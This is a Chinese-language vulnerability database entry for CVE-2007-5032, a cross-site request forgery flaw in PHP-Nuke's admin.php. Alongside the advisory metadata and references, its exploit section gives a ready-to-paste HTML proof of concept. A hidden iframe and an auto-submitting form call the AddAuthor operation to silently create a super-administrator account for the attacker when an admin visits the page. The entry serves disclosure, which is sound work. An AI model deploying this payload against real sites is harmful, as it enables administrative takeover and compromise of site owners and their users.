Francisco Francisco Burzi PHP-Nuke 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189062 漏洞类型 跨站请求伪造
发布时间 2007-09-21 更新时间 2007-09-21
CVE编号 CVE-2007-5032 CNNVD-ID CNNVD-200709-316
漏洞平台 N/A CVSS评分 5.1
|漏洞来源
https://www.securityfocus.com/bid/85349
https://cxsecurity.com/issue/WLB-2007090073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-316
|漏洞详情
FranciscoBurziPHP-Nuke中的admin.php存在跨站请求伪造漏洞,远程攻击者可以借助AddAuthor操作修改add_name和add_radminsuper参数来增加管理员账户。
|漏洞EXP
Paste this code into an HTML page then link it to victim (victim must be admin)

<iframe name="aiuto" frameborder="0" height="0" width="0"></iframe>
	<FORM name="Faiuto" ACTION="http://VICTIMURL/nuke/admin.php" target="aiuto" METHOD=POST>
	<input type=hidden NAME="add_name" value="ATTACKER">
	<input type=hidden NAME="add_aid" value="ATTACKER">
	<input type=hidden NAME="add_email" value="YOURMAIL (at) YOURDOMAIN (dot) IT [email concealed]">
	<input type=hidden NAME="add_url" value="YOURSITE">
	<input type=hidden NAME="add_admlanguage" value="italian">
	<input type=hidden NAME="add_radminsuper" value="1">
	<input type=hidden NAME="add_pwd" value="YOURPASSWORD">
	<input type=hidden NAME="op" value="AddAuthor">
	<input type="image" height="0" width="0">
	</FORM><SCRIPT>document.Faiuto.submit()</SCRIPT>

You are admin now ;)

Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
|受影响的产品
Francisco Burzi PHP-Nuke 5.3.1 Francisco Burzi PHP-Nuke 5.0.1 Francisco Burzi PHP-Nuke 4.4.1 a Francisco Burzi PHP-Nuke 8.0 Final Francisco Burzi PHP-Nuke 7.9 Francisco Bu
|参考资料

来源:BUGTRAQ
名称:20070920PHP-NukeaddadminALLVersions
链接:http://www.securityfocus.com/archive/1/archive/1/480107/100/0/threaded
来源:OSVDB
名称:42521
链接:http://osvdb.org/42521
来源:SREASON
名称:3157
链接:http://securityreason.com/securityalert/3157